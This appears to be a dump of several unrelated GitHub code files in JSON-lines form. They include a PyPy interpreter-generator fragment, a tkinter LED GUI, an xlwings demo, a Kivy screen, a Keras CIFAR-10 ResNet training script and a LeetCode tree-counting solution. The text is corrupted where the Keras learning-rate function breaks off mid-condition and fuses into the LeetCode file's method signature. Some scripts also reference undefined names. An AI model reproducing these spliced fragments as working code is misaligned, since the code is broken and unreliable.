PyTypeObject: Any = type\n PyType_Type: Any \n PyUnicode_Type: Any \n Py_EQ: Any \n Py_GE: Any \n Py_NE: Any \n Py_SIZE: Any \n Py_TPFLAGS_HEAPTYPE: Any \n Py_TPFLAGS_MANAGED_DICT: Any \n Py_TPFLAGS_MAPPING: Any \n Py_TPFLAGS_METHOD_DESCRIPTOR: Any \n Py_TPFLAGS_SEQUENCE: Any \n Py_ssize_t: Any \n _PyAttrCache: Any \n _PyBinaryOpCache: Any \n _PyBinarySubscrCache: Any \n _PyCFrame: Any \n _PyCFunctionFast: Any \n _PyCFunctionFastWithKeywords: Any \n _PyCallCache: Any \n _PyCompareOpCache: Any \n _PyErr_StackItem: Any \n _PyForIterCache: Any \n _PyFunction_Vectorcall: Any \n _PyInterpreterFrame: Any \n _PyListIterObject: Any \n _PyLoadGlobalCache: Any \n _PyLoadMethodCache: Any \n _PyOpcode_Deopt: Any \n _PyRangeIterObject: Any \n _PyStoreSubscrCache: Any \n _PyTupleIterObject: Any \n _PyUnpackSequenceCache: Any \n _Py_CODEUNIT: Any \n _Py_atomic_int: Any \n binaryfunc: Any \n next_instr: Any \n unaryfunc: Any \n \n PyAsyncGen_CheckExact: Callable \n PyCFunction_CheckExact: Callable \n PyCFunction_GET_FLAGS: Callable \n PyCFunction_GET_FUNCTION: Callable \n PyCFunction_GET_SELF: Callable \n PyCell_GET: Callable \n PyCell_New: Callable \n PyCell_SET: Callable \n PyCoro_CheckExact: Callable \n PyDict_CheckExact: Callable \n PyDict_DelItem: Callable \n PyDict_GetItemWithError: Callable \n PyDict_SetItem: Callable \n PyDict_Update: Callable \n PyErr_GivenExceptionMatches: Callable \n PyErr_SetExcInfo: Callable \n PyExceptionInstance_Check: Callable \n PyExceptionInstance_Class: Callable \n PyException_GetTraceback: Callable \n PyException_SetCause: Callable \n PyException_SetContext: Callable \n PyFloat_CheckExact: Callable \n PyFunction_Check: Callable \n PyFunction_GET_CODE: Callable \n PyFunction_GET_GLOBALS: Callable \n PyFunction_New: Callable \n PyGen_CheckExact: Callable \n PyIter_Check: Callable \n PyIter_Send: Callable \n PyList_AsTuple: Callable \n PyList_Check: Callable \n PyList_CheckExact: Callable \n PyLong_Check: Callable \n PyLong_CheckExact: Callable \n PyModule_CheckExact: Callable \n PyNumber_Negative: Callable \n PyNumber_Positive: Callable \n PyObject_CallMethodOneArg: Callable \n PyObject_CallOneArg: Callable \n PyObject_DelItem: Callable \n PyObject_IsTrue: Callable \n PyObject_RichCompare: Callable \n PyObject_SetAttr: Callable \n PyObject_SetItem: Callable \n PyObject_Str: Callable \n PyObject_Vectorcall: Callable \n PySequence_Check: Callable \n PySequence_Contains: Callable \n PySequence_Tuple: Callable \n PyTuple_CheckExact: Callable \n PyType_Check: Callable \n PyUnicode_CheckExact: Callable \n Py_CLEAR: Callable \n Py_IS_TYPE: Callable \n Py_Is: Callable \n Py_IsFalse: Callable \n Py_IsNone: Callable \n Py_IsTrue: Callable \n Py_NewRef: Callable \n Py_REFCNT: Callable \n Py_SETREF: Callable \n Py_UNREACHABLE: Callable \n Py_XSETREF: Callable \n _PyAsyncGenValueWrapperNew: Callable \n _PyBuildSlice_ConsumeRefs: Callable \n _PyCFunction_TrampolineCall: Callable \n _PyCode_CODE: Callable \n _PyCoro_GetAwaitableIter: Callable \n _PyCoro_GetAwaitableIter: Callable \n _PyDictOrValues_GetDict: Callable \n _PyDictOrValues_GetValues: Callable \n _PyDictOrValues_IsValues: Callable \n _PyDictValues_AddToInsertionOrder: Callable \n _PyDict_FromItems: Callable \n _PyDict_GetItemWithError: Callable \n _PyDict_LoadGlobal: Callable \n _PyDict_MergeEx: Callable \n _PyDict_NotifyEvent: Callable \n _PyDict_SetItem_Take2: Callable \n _PyErr_Clear: Callable \n _PyErr_ExceptionMatches: Callable \n _PyErr_Format: Callable \n _PyErr_FormatFromCause: Callable \n _PyErr_Occurred: Callable \n _PyErr_Restore: Callable \n _PyErr_SetKeyError: Callable \n _PyErr_SetString: Callable \n _PyEvalFrameClearAndPop: Callable \n _PyEvalFramePushAndInit: Callable \n _PyExc_PrepReraiseStar: Callable \n _PyFrame_Copy: Callable \n _PyFrame_FastToLocalsWithError: Callable \n _PyFrame_GetGenerator: Callable \n _PyFrame_IsIncomplete: Callable \n _PyFrame_LocalsToFast: Callable \n _PyFrame_PushUnchecked: Callable \n _PyFrame_SetStackPointer: Callable \n _PyFrame_StackPush: Callable \n _PyGen_FetchStopIterationValue: Callable \n _PyGen_yf: Callable \n _PyInterpreterState_GET: Callable \n _PyList_AppendTakeRef: Callable \n _PyList_FromArraySteal: Callable \n _PyList_ITEMS: Callable \n _PyLong_AssignValue: Callable \n _PyLong_GetZero: Callable \n _PyLong_IsPositiveSingleDigit: Callable \n _PyObject_CallNoArgs: Callable \n _PyObject_DictOrValuesPointer: Callable \n _PyObject_GC_IS_TRACKED: Callable \n _PyObject_GC_MAY_BE_TRACKED: Callable \n _PyObject_GC_TRACK: Callable \n _PyObject_GetMethod: Callable \n _PyObject_LookupSpecial: Callable \n _PySet_Update: Callable \n _PySys_GetAttr: Callable \n _PyThreadState_HasStackSpace: Callable \n _PyThreadState_PopFrame: Callable \n _PyTuple_FromArraySteal: Callable \n _PyTuple_ITEMS: Callable \n _PyType_HasFeature: Callable \n _PyType_HasFeature: Callable \n _PyUnicode_FromASCII: Callable \n _PyUnicode_JoinArray: Callable \n _Py_DECREF_NO_DEALLOC: Callable \n _Py_EnterRecursiveCallTstate: Callable \n _Py_LeaveRecursiveCallPy: Callable \n _Py_LeaveRecursiveCallTstate: Callable \n _Py_MakeCoro: Callable \n _Py_OPARG: Callable \n _Py_OPCODE: Callable \n _Py_STR: Callable \n _Py_Specialize_BinaryOp: Callable \n _Py_Specialize_BinarySubscr: Callable \n _Py_Specialize_Call: Callable \n _Py_Specialize_CompareOp: Callable \n _Py_Specialize_ForIter: Callable \n _Py_Specialize_LoadAttr: Callable \n _Py_Specialize_LoadGlobal: Callable \n _Py_Specialize_StoreAttr: Callable \n _Py_Specialize_StoreSubscr: Callable \n _Py_Specialize_UnpackSequence: Callable \n _Py_atomic_load_relaxed_int32: Callable \n \n call_exc_trace: Callable \n check_args_iterable: Callable \n check_except_star_type_valid: Callable \n check_except_type_valid: Callable \n deref: Callable \n do_call_core: Callable \n do_raise: Callable \n exception_group_match: Callable \n format_awaitable_error: Callable \n format_exc_check_arg: Callable \n format_exc_unbound: Callable \n format_kwargs_error: Callable \n import_all_from: Callable \n import_from: Callable \n import_name: Callable \n is_method: Callable \n match_class: Callable \n match_keys: Callable \n post_decr: Callable \n post_incr: Callable \n read_obj: Callable \n read_u16: Callable \n read_u32: Callable \n ref: Callable \n static_assert: Callable \n trace_call_function: Callable \n unpack_iterable: Callable \n \n \"\"\"\n )\n )\n # ^(?:[\\t ]*(?:\\r?\\n|\\r))+ after wards\n mod = generator.visit(tree)\n print(generator.field_names)\n mod = FixupMatchsVisitor().visit(mod)\n mod = FixupCallAssignVisitor().visit(mod)\n mod = FixupConstantsVisitor().visit(mod)\n mod = FixupNullVisitor(\n field_names=generator.field_names + [\"entry_frame\"]\n ).visit(mod)\n o.write(ast.unparse(mod))\n\n\nif __name__ == \"__main__\":\n arg_parser = argparse.ArgumentParser(\n description=\"Generate the code for the interpreter switch.\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n arg_parser.add_argument(\n \"-i\", \"--input\", type=str, help=\"Instruction definitions\", default=DEFAULT_INPUT\n )\n arg_parser.add_argument(\n \"-o\", \"--output\", type=str, help=\"Generated code\", default=DEFAULT_OUTPUT\n )\n args = arg_parser.parse_args()\n translate_to_py(args.input, args.output)\n","repo_name":"makslevental/pypy","sub_path":"interpreter_generator/translate_to_py.py","file_name":"translate_to_py.py","file_ext":"py","file_size_in_byte":14032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37524447394","text":"import tkinter as tk\nimport time\n\nimport led_logic\n\n# class Application(tk.Frame):\n# def __init__(self, master=None):\n# tk.Frame.__init__(self, master)\n# self.grid()\n# x_size=24\n# y_size=5\n# self.createWidgets(x_size,y_size)#odysee2016 beschaltung\n# self.grid1=led_logic.Grid(x_size,y_size)\n# self.rainbow=led_logic.Rainbow(self.grid1)\n# self.rainbow.horizontal_wave_initial()\n\nclass UI():\n def __init__(self):\n pass\n\n def createWidgets(self,x_size,y_size):\n self.button_grid=[]\n for x in range(x_size):\n self.button_grid.append([])\n for y in range(y_size):\n but=self.add_button(x,y)\n self.button_grid[x].append([])\n self.button_grid[x][y]=but\n #print(self.button_grid[x][y])\n \n self.test1 = tk.Button(self, text=\"Test1\", fg=\"red\",command=self.do_test1)\n self.test1.grid(row=0, column=x_size+1)\n self.test2 = tk.Button(self, text=\"Test2\", fg=\"red\",command=self.do_test2)\n self.test2.grid(row=1, column=x_size+1)\n \n self.QUIT = tk.Button(self, text=\"QUIT\", fg=\"red\",command=root.destroy)\n self.QUIT.grid(row=9, column=x_size+1)\n \n def update_button_colors(self,grid):\n tab=grid\n for x in range(len(tab)):\n for y in range(len(tab[0])):\n rgb=tab[x][y].get_color()\n hex_string=self._rgb_to_hex(rgb)\n #print(\"rgb:\",rgb,\"hex\",hex_string)\n self.button_grid[x][y][\"bg\"]=hex_string#'#000000'\n \n def _rgb_to_hex(self,rgb):\n hex_r=self._hex_string(int(rgb[0]*255))\n hex_g=self._hex_string(int(rgb[1]*255))\n hex_b=self._hex_string(int(rgb[2]*255))\n hex_str=\"#\"+hex_r+hex_g+hex_b\n #print(\"rgb\",rgb,\"hex_str\",hex_str)\n return hex_str\n \n def _hex_string(self,integer):\n h=str(hex(integer)).replace(\"0x\",\"\")\n if len(h)==1:\n h=\"0\"+h\n return h\n \n def add_button(self,x,y,color='#00F000'):\n hi_there = tk.Button(self,bg=color)\n #self.hi_there[\"text\"] = \"x\"\n hi_there[\"command\"] = self.say_hi\n hi_there.grid(row=y, column=x)\n return hi_there\n \n def say_hi(self):\n print(\"hi there, everyone!\")\n \n def do_test1(self):\n new_grid=self.rainbow.tick()\n self.update_button_colors(new_grid)\n root.after(50, self.do_test1)\n \n def do_test2(self):\n print(\"bar\")\n self.button_grid[5][2][\"bg\"]='#000000'\n\n","repo_name":"odenwilusenz/LRK","sub_path":"Programmieren/workspace/wireless_led_bar/common_gui_components.py","file_name":"common_gui_components.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32884813400","text":"\nimport xlwings as xw\nimport numpy as np\n#import pandas as pd\n\ndata1 = np.random.randint(1, 100, 10000)\nprint(data1.shape)\nxw.view(data1)\n\n\ndata2 = data1.reshape(100, 100)\nprint(data2.shape)\nxw.view(data2)","repo_name":"pepitogrilho/learning_python","sub_path":"xUdemy_xlwings/S2_FirstSteps/S2_10_xlwings_as_DataViewer_01.py","file_name":"S2_10_xlwings_as_DataViewer_01.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"24656017320","text":"#DO NOT LINK THIS PAGE, I PUT IN HERE BY ACCIDENT\n\nfrom kivy.properties import StringProperty\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.uix.textinput import TextInput\n\n\nclass HomeScreen(Screen):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n layout = GridLayout(cols=2, row_force_default=True, row_default_height=60, spacing=10, padding=30)\n # Use a Label for the description\n\n search_input = TextInput(\n hint_text='Search for a guild...',\n size_hint = (None, None),\n size = (950, 50),\n pos_hint={'center_x': 0.4, 'center_y': 0.975}\n )\n\n\n submit = Button(\n text=\"Search\",\n size_hint=(None, None),\n size=(200, 50),\n pos_hint={'center_x': 0.7, 'y': 0.95},\n on_press=self.submit\n )\n class GuildBannerMenu():\n createGuild = Button(\n text=\"+ Guild\",\n size_hint=(None, None),\n size=(300, 100),\n pos_hint={'center_x': 0.1, 'y': 0.8},\n on_press=self.submit\n )\n \n myGuilds = Button(\n text=\"My Guild\",\n size_hint=(None, None),\n size=(300, 100),\n pos_hint={'center_x': 0.1, 'y': 0.7},\n on_press=self.submit\n )\n people = Button(\n text=\"My People\",\n size_hint=(None, None),\n size=(300, 100),\n pos_hint={'center_x': 0.1, 'y': 0.6},\n on_press=self.submit\n )\n \n class GuildScrolling():\n\n guilds = GridLayout(cols=1, spacing=10, size_hint_y=None)\n\n for i in range(100):\n btn = Button(text=str(i), size_hint_y=None, height=40)\n guilds.add_widget(btn)\n\n ScrollingGuilds = ScrollView(\n size_hint=(1, None),\n size=(500, 500),\n\n do_scroll_x = False)\n\n ScrollingGuilds.add_widget(guilds)\n\n\n \n\n\n #image stuff seems not to work anymore?\n #guildHolder = Image(source =\"GALAXYBRAINS.png\")\n\n\n\n #self.add_widget(guildHolder)\n\n # guildScroll = ScrollView(\n # do_scroll_y: True\n\n # )\n\n self.add_widget(search_input)\n self.add_widget(submit)\n self.add_widget(GuildBannerMenu.createGuild)\n self.add_widget(GuildBannerMenu.myGuilds)\n self.add_widget(GuildBannerMenu.people)\n self.add_widget(GuildScrolling.ScrollingGuilds)\n\n # # Use a Label for the description\n # more_text_label = Label(\n # text='Explain how your day is going:',\n # font_size=24,\n # pos_hint={'center_x': 0.5, 'center_y': 0.7}\n # )\n\n # Use a TextInput for entering the description\n # self.more_text_input = TextInput(\n # hint_text='Type here',\n # size_hint=(None, None),\n # size=(600, 200),\n # pos_hint={'center_x': 0.5, 'center_y': 0.5}\n # )\n\n next_button = Button(\n text=\"Next\",\n size_hint=(None, None),\n size=(100, 50),\n pos_hint={'center_x': 0.90, 'y': 0.05},\n on_press=self.on_next_button_click\n )\n back_button = Button(\n text=\"Back\",\n size_hint=(None, None),\n size=(100, 50),\n pos_hint={'center_x': 0.10, 'y': 0.05},\n on_press=self.on_back_button_click\n )\n\n\n class ScrollableLabel(ScrollView):\n text = StringProperty('')\n\n\n\n self.add_widget(back_button)\n self.add_widget(next_button)\n # self.add_widget(more_text_label)\n # self.add_widget(self.more_text_input)\n self.add_widget(layout)\n def on_back_button_click(self, instance):\n self.manager.current = \"image2\"\n def on_next_button_click(self, instance):\n self.manager.current = \"exit_window\"\n\n def submit(self, instance):\n search = self.search_input.text\n # Here, you can process the submitted weight and height as needed\n # For example, you can print them to the console\n print(f\"Stuff from search bar: {search}\")\n\n\nif __name__ == '__main__':\n SignUpApp().run()\n\n","repo_name":"skyeeey/Better-GUIlds","sub_path":"Res/HomeScreen.py","file_name":"HomeScreen.py","file_ext":"py","file_size_in_byte":4295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32558629534","text":"rs = 10001\nimport datetime\nnow = datetime.datetime.now()\nprint(now)\n\nimport pandas as pd\nimport matplotlib\n\nfrom numpy.random import randn\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nfrom IPython.display import SVG\nfrom keras.utils.vis_utils import model_to_dot\n\nimport os\nprint(os.listdir(\"../kaggle_cifar10\"))\n\n\nimport os.path\nimport itertools\nfrom itertools import chain\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn import datasets\nfrom sklearn import preprocessing\nfrom sklearn.decomposition import PCA\nfrom sklearn import cluster, datasets, mixture\nfrom sklearn.datasets import load_digits\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.metrics import f1_score, classification_report, confusion_matrix\nfrom sklearn.model_selection import train_test_split\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nimport seaborn as sns\n\nimport tensorflow as tf\n\nfrom keras.layers import Input, Embedding, LSTM, GRU, Dense, Dropout, Lambda, \\\n Conv1D, Conv2D, Conv3D, \\\n Conv2DTranspose, \\\n AveragePooling1D, AveragePooling2D, \\\n MaxPooling1D, MaxPooling2D, MaxPooling3D, \\\n GlobalAveragePooling1D, GlobalAveragePooling2D, \\\n GlobalMaxPooling1D, GlobalMaxPooling2D, GlobalMaxPooling3D, \\\n LocallyConnected1D, LocallyConnected2D, \\\n concatenate, Flatten, Average, Activation, \\\n RepeatVector, Permute, Reshape, Dot, \\\n multiply, dot, add, \\\n PReLU, \\\n Bidirectional, TimeDistributed, \\\n SpatialDropout1D, \\\n BatchNormalization\nfrom keras.models import Model, Sequential\nfrom keras import losses\nfrom keras.callbacks import BaseLogger, ProgbarLogger, Callback, History\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler, ReduceLROnPlateau\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom keras import regularizers\nfrom keras import initializers\nfrom keras.metrics import categorical_accuracy\nfrom keras.constraints import maxnorm, non_neg\nfrom keras.optimizers import RMSprop\nfrom keras.utils import to_categorical, plot_model\nfrom keras import backend as K\nfrom keras.preprocessing.image import ImageDataGenerator\nimport keras\n\nfrom PIL import Image\nfrom zipfile import ZipFile\nimport h5py\nimport cv2\nfrom tqdm import tqdm\n\n\nfrom keras_ex.gkernel import GaussianKernel, GaussianKernel2, GaussianKernel3\n\n#Load Data\nsrc_dir = '../kaggle_cifar10/cifar10-dataset'\ntrain_data = os.path.join(src_dir, 'train_test/train')\ntest_data = os.path.join(src_dir, 'train_test/test')\n\n\n#...........\ntrain_labels = pd.read_csv(os.path.join(src_dir, \"trainLabels.csv\"))\nprint(train_labels.shape)\ntrain_labels.head(10)\n\n\n#.........\nid_key = dict([ee for ee in enumerate(np.unique(train_labels.label.values))])\nid_key\n\n\nkey_id = dict([(ee[1], ee[0]) for ee in enumerate(np.unique(train_labels.label.values))])\nkey_id\n\ny_train0 = np.array([key_id[ee] for ee in train_labels.label.values])\ny_train0\n\ntest_labels = pd.read_csv(os.path.join(src_dir, \"sampleSubmission.csv\"))\nprint(test_labels.shape)\ntest_labels.head()\n\n#..........\nfrom zipfile import ZipFile\n\ntrainImg_list = []\nwith ZipFile(train_zip, 'r') as myzip:\n for ii in train_labels.id.values:\n with myzip.open('train/'+str(ii)+'.png') as tgt:\n img = Image.open(tgt)\n img_array = np.asarray(img)\n trainImg_list.append(img_array)\n\nx_train0 = np.stack(trainImg_list).astype('float32') / 255.0\nx_train0.shape\n\ntestImg_list = []\nwith ZipFile(test_zip, 'r') as myzip:\n for ii in test_labels.id.values:\n with myzip.open('test/'+str(ii)+'.png') as tgt:\n img = Image.open(tgt)\n img_array = np.asarray(img)\n testImg_list.append(img_array)\n\nx_test = np.stack(testImg_list).astype('float32') / 255.0\nx_test.shape\nplt.imshow(x_train0[0])\nplt.imshow(x_test[0])\ny_cat_train0 = to_categorical(y_train0)\nprint(y_cat_train0.shape)\n\n#.........\nnrows=10\nncols=10\nfig, subs = plt.subplots(nrows=nrows, ncols=ncols, figsize=(15, 10))\n\nfor ii in range(nrows):\n for jj in range(ncols):\n iplt = subs[ii, jj]\n img_array = x_train0[ii*ncols + jj]\n iplt.imshow(img_array)\n\n#........\nnrows=10\nncols=12\nfig, subs = plt.subplots(nrows=nrows, ncols=ncols, figsize=(15, 10))\n\nfor ii in range(nrows):\n idx = (y_train0 == ii)\n target_img = x_train0[idx][:ncols]\n for jj in range(ncols):\n iplt = subs[ii, jj]\n img_array = target_img[jj]\n iplt.imshow(img_array)\nx_train = x_train0\ny_train = y_train0\ny_cat_train = y_cat_train0\n#Create model\ndef make_trainable_false(model, trainable=False):\n layers = model.layers\n for ilayer in layers:\n ilayer.trainable = trainable\n return\n\nclass TrainableCtrl(object):\n \n def __init__(self, model_dic):\n self.model_dic = model_dic\n self.trainable_dic = {}\n self.get_trainable()\n \n def get_trainable(self):\n for k in self.model_dic:\n model = self.model_dic[k]\n res = []\n for ilayer in model.layers:\n res.append(ilayer.trainable)\n self.trainable_dic[k] = res\n \n def set_trainable_false(self, model_key):\n model = self.model_dic[model_key]\n make_trainable_false(model)\n \n def set_trainable_true(self, model_key):\n model = self.model_dic[model_key]\n for ii, ilayer in enumerate(model.layers):\n ilayer.trainable = self.trainable_dic[model_key][ii]\n\nimg_shape = x_train.shape[1:]\nimg_dim = np.array(img_shape).prod()\nprint(img_dim)\n\nnn = 256*2 # output dim of img_cnvt\n\nnum_cnvt_lm = 2\nnum_cls = 10\n\nn = 3\ndepth = n * 9 + 2\n\ndef resnet_layer(inputs,\n num_filters=16,\n kernel_size=3,\n strides=1,\n activation='relu',\n batch_normalization=True,\n conv_first=True):\n \"\"\"2D Convolution-Batch Normalization-Activation stack builder\n # Arguments\n inputs (tensor): input tensor from input image or previous layer\n num_filters (int): Conv2D number of filters\n kernel_size (int): Conv2D square kernel dimensions\n strides (int): Conv2D square stride dimensions\n activation (string): activation name\n batch_normalization (bool): whether to include batch normalization\n conv_first (bool): conv-bn-activation (True) or\n bn-activation-conv (False)\n # Returns\n x (tensor): tensor as input to the next layer\n \"\"\"\n conv = Conv2D(num_filters,\n kernel_size=kernel_size,\n strides=strides,\n padding='same',\n kernel_initializer='he_normal',\n kernel_regularizer=regularizers.l2(1e-4))\n\n x = inputs\n if conv_first:\n x = conv(x)\n if batch_normalization:\n x = BatchNormalization()(x)\n if activation is not None:\n x = Activation(activation)(x)\n else:\n if batch_normalization:\n x = BatchNormalization()(x)\n if activation is not None:\n x = Activation(activation)(x)\n x = conv(x)\n return x\n\ndef _resnet_v2(input_shape, depth, num_classes=10):\n \"\"\"ResNet Version 2 Model builder [b]\n Stacks of (1 x 1)-(3 x 3)-(1 x 1) BN-ReLU-Conv2D or also known as\n bottleneck layer\n First shortcut connection per layer is 1 x 1 Conv2D.\n Second and onwards shortcut connection is identity.\n At the beginning of each stage, the feature map size is halved (downsampled)\n by a convolutional layer with strides=2, while the number of filter maps is\n doubled. Within each stage, the layers have the same number filters and the\n same filter map sizes.\n Features maps sizes:\n conv1 : 32x32, 16\n stage 0: 32x32, 64\n stage 1: 16x16, 128\n stage 2: 8x8, 256\n # Arguments\n input_shape (tensor): shape of input image tensor\n depth (int): number of core convolutional layers\n num_classes (int): number of classes (CIFAR10 has 10)\n # Returns\n model (Model): Keras model instance\n \"\"\"\n if (depth - 2) % 9 != 0:\n raise ValueError('depth should be 9n+2 (eg 56 or 110 in [b])')\n # Start model definition.\n num_filters_in = 16\n num_res_blocks = int((depth - 2) / 9)\n\n inputs = Input(shape=input_shape)\n # v2 performs Conv2D with BN-ReLU on input before splitting into 2 paths\n x = resnet_layer(inputs=inputs,\n num_filters=num_filters_in,\n conv_first=True)\n\n # Instantiate the stack of residual units\n for stage in range(3):\n for res_block in range(num_res_blocks):\n activation = 'relu'\n batch_normalization = True\n strides = 1\n if stage == 0:\n num_filters_out = num_filters_in * 4\n if res_block == 0: # first layer and first stage\n activation = None\n batch_normalization = False\n else:\n num_filters_out = num_filters_in * 2\n if res_block == 0: # first layer but not first stage\n strides = 2 # downsample\n\n # bottleneck residual unit\n y = resnet_layer(inputs=x,\n num_filters=num_filters_in,\n kernel_size=1,\n strides=strides,\n activation=activation,\n batch_normalization=batch_normalization,\n conv_first=False)\n y = resnet_layer(inputs=y,\n num_filters=num_filters_in,\n conv_first=False)\n y = resnet_layer(inputs=y,\n num_filters=num_filters_out,\n kernel_size=1,\n conv_first=False)\n if res_block == 0:\n # linear projection residual shortcut connection to match\n # changed dims\n x = resnet_layer(inputs=x,\n num_filters=num_filters_out,\n kernel_size=1,\n strides=strides,\n activation=None,\n batch_normalization=False)\n x = add([x, y])\n\n num_filters_in = num_filters_out\n\n # Add classifier on top.\n x1 = GlobalMaxPooling2D()(x)\n x2 = GlobalAveragePooling2D()(x)\n x = concatenate([x1, x2])\n # v2 has BN-ReLU before Pooling\n# x = BatchNormalization()(x)\n x = Activation('sigmoid')(x)\n# x = AveragePooling2D(pool_size=8)(x)\n \n # Instantiate model.\n model = Model(inputs=inputs, outputs=x, name='model_img_converter')\n return model\n\n#............. image_converter\nmodel_img_cnvt = _resnet_v2(input_shape=img_shape, depth=depth)\nmodel_img_cnvt.summary()\n\n#gkernel2\ndef make_model_gkernel(nn=nn, num_lm=num_cnvt_lm, random_state=0, scale=1):\n inp = Input(shape=(nn,), name='inp')\n oup = inp\n \n np.random.seed(random_state)\n #init_wgt = (np.random.random_sample((num_lm, nn))-0.5) * scale\n init_wgt = np.random.random_sample((num_lm, nn))\n \n weights2 = [init_wgt, np.log(np.array([1/(2*nn*0.1*scale)]))]\n oup = GaussianKernel3(num_landmark=num_lm, num_feature=nn, weights=weights2, name='gkernel')(oup)\n# weights2 = [np.log(np.array([1/(2*nn*0.1*scale)]))]\n# oup = GaussianKernel2(init_wgt, weights=weights2, name='gkernel')(oup)\n model = Model(inp, oup, name='model_gkernel')\n return init_wgt, model\n\nlm_gkernel, model_gkernel = make_model_gkernel(random_state=rs)\nmodel_gkernel.summary()\n\nprint(lm_gkernel.shape)\n\ndf = pd.DataFrame(lm_gkernel[:,:5])\ndf.head()\nfig = sns.pairplot(df, markers=['o'], height=2.2, diag_kind='hist')\n\n#output layer\ndef get_circle(nn=10, rs=None):\n np.random.seed(rs)\n idx = np.pi*2*np.arange(nn)/nn\n idx += 2*np.pi*np.random.random(1)\n idx = np.random.permutation(idx)\n #return idx\n init_wgt = np.c_[np.cos(idx), np.sin(idx)]\n return init_wgt\n\ninit_circle = get_circle(nn=num_cls, rs=rs)\ninit_circle = init_circle*0.8/2 + 0.5\nprint(init_circle)\n\ndf = pd.DataFrame(init_circle)\ndf['cls'] = ['c'+str(ee) for ee in range(num_cls)]\ndf.head()\nfig = sns.pairplot(df, markers='o', size=2.2, diag_kind='hist', hue='cls')\naxes = fig.axes\naxes[0,0].set_xlim(0, 1)\naxes[0,0].set_ylim(0, 1)\naxes[1,1].set_xlim(0, 1)\naxes[1,1].set_ylim(0, 1)\n\ndef make_models_out(init_heart, nn=num_cnvt_lm, num_cls=num_cls):\n inp = Input(shape=(nn,), name='inp')\n # oup = Dense(num_cls, activation='sigmoid')(inp)\n# init_wgt = np.random.random_sample((num_cls, nn))\n# weights = [init_wgt, np.log(np.array([1/(2*nn*0.1)]))]\n# oup = GaussianKernel3(num_landmark=num_cls, num_feature=nn, weights=weights, name='gkernel3')(inp)\n weights = [np.log(np.array([1/(2*nn*0.1)]))]\n oup = GaussianKernel2(init_heart, weights=weights, name='gkernel_out')(inp)\n model = Model(inp, oup, name='model_out')\n return model\n\nmodel_out = make_models_out(init_circle)\nmodel_out.summary()\n\n\ndef make_modelz(img_shape, model_img_cnvt, model_gkernel2, model_out):\n inp = Input(shape=img_shape, name='inp')\n oup = model_img_cnvt(inp)\n oup = model_gkernel2(oup)\n oup1 = model_out(oup)\n pre_model = Model(inp, oup1)\n pre_model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n return {\n 'pre_model': pre_model,\n 'model_img_cnvt': model_img_cnvt,\n 'model_gkernel2': model_gkernel2,\n 'model_out': model_out,\n }\n\nmodels = make_modelz(img_shape, model_img_cnvt, model_gkernel, model_out)\nmodels['pre_model'].summary()\n\nTHRESHOLD = 0.5\n\n# credits: https://www.kaggle.com/guglielmocamporese/macro-f1-score-keras\n\nK_epsilon = K.epsilon()\ndef f1(y_true, y_pred):\n #y_pred = K.round(y_pred)\n y_pred = K.cast(K.greater(K.clip(y_pred, 0, 1), THRESHOLD), K.floatx())\n tp = K.sum(K.cast(y_true*y_pred, 'float'), axis=0)\n tn = K.sum(K.cast((1-y_true)*(1-y_pred), 'float'), axis=0)\n fp = K.sum(K.cast((1-y_true)*y_pred, 'float'), axis=0)\n fn = K.sum(K.cast(y_true*(1-y_pred), 'float'), axis=0)\n\n p = tp / (tp + fp + K_epsilon)\n r = tp / (tp + fn + K_epsilon)\n\n f1 = 2*p*r / (p+r+K_epsilon)\n f1 = tf.where(tf.is_nan(f1), tf.zeros_like(f1), f1)\n return K.mean(f1)\n\ndef f1_loss(y_true, y_pred):\n \n #y_pred = K.cast(K.greater(K.clip(y_pred, 0, 1), THRESHOLD), K.floatx())\n tp = K.sum(K.cast(y_true*y_pred, 'float'), axis=0)\n tn = K.sum(K.cast((1-y_true)*(1-y_pred), 'float'), axis=0)\n fp = K.sum(K.cast((1-y_true)*y_pred, 'float'), axis=0)\n fn = K.sum(K.cast(y_true*(1-y_pred), 'float'), axis=0)\n\n p = tp / (tp + fp + K_epsilon)\n r = tp / (tp + fn + K_epsilon)\n\n f1 = 2*p*r / (p+r+K_epsilon)\n f1 = tf.where(tf.is_nan(f1), tf.zeros_like(f1), f1)\n return 1-K.mean(f1)\n\ngamma = 2.0\nepsilon = K.epsilon()\ndef focal_loss(y_true, y_pred):\n pt = y_pred * y_true + (1-y_pred) * (1-y_true)\n pt = K.clip(pt, epsilon, 1-epsilon)\n CE = -K.log(pt)\n FL = K.pow(1-pt, gamma) * CE\n loss = K.sum(FL, axis=1)\n return loss\n\n#Train\nmodels['pre_model'].compile(loss=focal_loss,\n optimizer='adam',\n metrics=['categorical_accuracy', 'binary_accuracy', f1])\nmodels['pre_model'].summary()\n\ndef lr_schedule(epoch):\n lr0 = 0.001\n epoch1 = 64\n epoch2 = 64\n epoch3 = 64\n epoch4 = 64\n \n if epoch int:\n if not root:\n return 0\n\n return 1+self.countNodes(root.left)+self.countNodes(root.right)\n\n def countNodesOptimized(self, root: Optional[TreeNode]) -> int:\n if not root:\n return 0\n\n left_level: int = 1\n left_node: TreeNode = root.left\n\n while(left_node):\n left_node = left_node.left\n left_level += 1\n\n right_level = 1\n right_node: TreeNode = root.right\n\n while(right_node):\n right_node = right_node.right\n right_level += 1\n\n if left_level == right_level:\n return (2**left_level)-1\n\n return 